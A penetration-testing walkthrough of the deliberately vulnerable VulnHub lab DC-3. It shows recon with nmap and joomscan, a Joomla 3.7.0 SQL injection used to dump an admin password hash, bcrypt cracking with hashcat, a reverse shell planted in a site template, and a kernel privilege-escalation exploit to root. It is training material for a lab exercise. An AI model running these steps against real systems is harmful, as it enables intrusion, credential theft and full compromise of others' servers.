Info

Name: DC-3
Operating System: Linux
Url: http://www.five86.com/dc-3.html
Release: 26 Mar 2019
Difficulty: Beginner
Description: DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Enumeration

As always we start with a nmap scan to discover open ports and running services.

nmap -sC -sV -oA nmap/initial 192.168.1.144
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-06 00:09 CEST
Nmap scan report for 192.168.1.144
Host is up (0.00014s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
MAC Address: 00:0C:29:8A:D7:BC (VMware)

We only have one port open, and the server seems to be running Apache and Joomla!

By visiting the web page we can easily confirm that the server in fact is running Joomla!

Enumerating the web page doesn't give us anything of interest. Let's run Joomscan and see what we can find.

root@kali:~/Vulnhub/DC3# joomscan --url 192.168.1.144
                                                                                     
    ____  _____  _____  __  __  ___   ___    __    _  _
   (_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
  .-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  (
  \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                        (1337.today)

    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://192.168.1.144 ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing : 
http://192.168.1.144/administrator/components
http://192.168.1.144/administrator/modules
http://192.168.1.144/administrator/templates
http://192.168.1.144/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.1.144/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found


Your Report : reports/192.168.1.144/

We see that the server is running Joomla 3.7.0. This specific version is vulnerable to SQL Injections (CVE-2017-8917).
And instead of doing the SQLi manually someone's already created an awesome tools called Joomblah to extract hashes and sessions from the Joomla database.

Let's try and dump creds and sessions to get an initial foothold!

Initial Foothold

root@kali:~/Vulnhub/DC3# python joomblah.py http://192.168.1.144
                                                                                                                    
    .---.    .-'''-.        .-'''-.
    |   |   '   _    \     '   _    \                            .---.
    '---' /   /` '.   \  /   /` '.   \  __  __   ___   /|        |   |            .
    .---..   |     \  ' .   |     \  ' |  |/  `.'   `. ||        |   |          .'|
    |   ||   '      |  '|   '      |  '|   .-.  .-.   '||        |   |         <  |
    |   |\    \     / / \    \     / / |  |  |  |  |  |||  __    |   |    __    | |
    |   | `.   ` ..' /   `.   ` ..' /  |  |  |  |  |  |||/'__ '. |   | .:--.'.  | | .'''-.    
    |   |    '-...-'`       '-...-'`   |  |  |  |  |  ||:/`  '. '|   |/ |   \ | | |/.'''. \   
    |   |                              |  |  |  |  |  |||     | ||   |`" __ | | |  /    | |   
    |   |                              |__|  |__|  |__|||\    / '|   | .'.''| | | |     | |   
 __.'   '                                              |/'..' / '---'/ /   | |_| |     | |   
|      '                                               '  `'-'`       \ \._,\ '/| '.    | '.  
|____.'                                                                `--'  `" '---'   '---' 

 [-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: d8uea_users
  -  Found table: users
  -  Extracting users from d8uea_users
 [$] Found user ['629', 'admin', 'admin', 'freddy@norealaddress.net', '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu', '', '']
  -  Extracting sessions from d8uea_session
  -  Extracting users from users
  -  Extracting sessions from session

Okay, so we didn't get any sessions, but we got a hash! Using Hashcat with mode 3200 (bcrypt) we can try and crack the hash.

Since I'm running Kali Linux in a VM, I like to crack hashes on my Windows install, so I can utilize my GTX 1080TI for better performance.

After we have transfered the hash to the Windows install and started Hashcat, we only need to wait about 3 seconds before we successfully crack the hash!

C:\hashcat\hashcat64.exe -m 3200 hashes.txt rockyou.txt
[...]
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu:snoopy

Session..........: hashcatStatus...........: Cracked
Hash.Type........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0...lfB1Zu
Time.Started.....: Sat Apr 06 00:37:08 2019 (3 secs)
Time.Estimated...: Sat Apr 06 00:37:11 2019 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      630 H/s (5.43ms) @ Accel:8 Loops:2 Thr:8 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 1792/14344385 (0.01%)
Rejected.........: 0/1792 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Candidates.#1....: 123456 -> divina
HWMon.Dev.#1.....: Temp: 67c Fan: 30% Util: 98% Core:1822MHz Mem:5508MHz Bus:16

We can now login to http://192.168.1.144/administrator.

Looking at the revisions for the one blogpost on the webpage, we see the following:

Wonder if the author at one point was considering having hints for this machine as well ;)

Anyway, by editing the template currently in use, we can add a reverse shell (first line of code in the image below) and make the server connect back to us.

After setting up a listener on our machine, we simply just refresh the index page and get a reverse shell!

root@kali:~/Vulnhub/DC3# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.1.142] from (UNKNOWN) [192.168.1.144] 55872
/bin/sh: 0: can't access tty; job control turned off
$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Now, let's own root!

Privilege Escalation

After upgrading our shell so we get autocomplete etc. we check the kernel version and /etc/issue and see the following:

cat /etc/issue;uname -a
Ubuntu 16.04 LTS \n \l

Linux DC3VM 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux

Doing a searchsploit for "Ubuntu 16.04" we see that this machine is vulnerable to a local privilege escalation:
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation

So, after downloading the exploit and extracting it to /tmp (/dev/shm wouldn't work) we can run the exploit and see if we get a root shell.

www-data@DC3VM:/tmp/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@DC3VM:/tmp/ebpf_mapfd_doubleput_exploit# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),33(www-data)

... And we can finally cat the root flag!

root@DC3VM:/root# cat the-flag.txt 
 __        __   _ _   ____                   _ _ _ _ 
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
                                                     

Congratulations are in order for completing DC-3VM.  :-)

I hope you've enjoyed this challenge as much as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

Boom!

Further Reading

https://hashcat.net/hashcat/

https://github.com/rezasp/joomscan

https://www.exploit-db.com/exploits/39772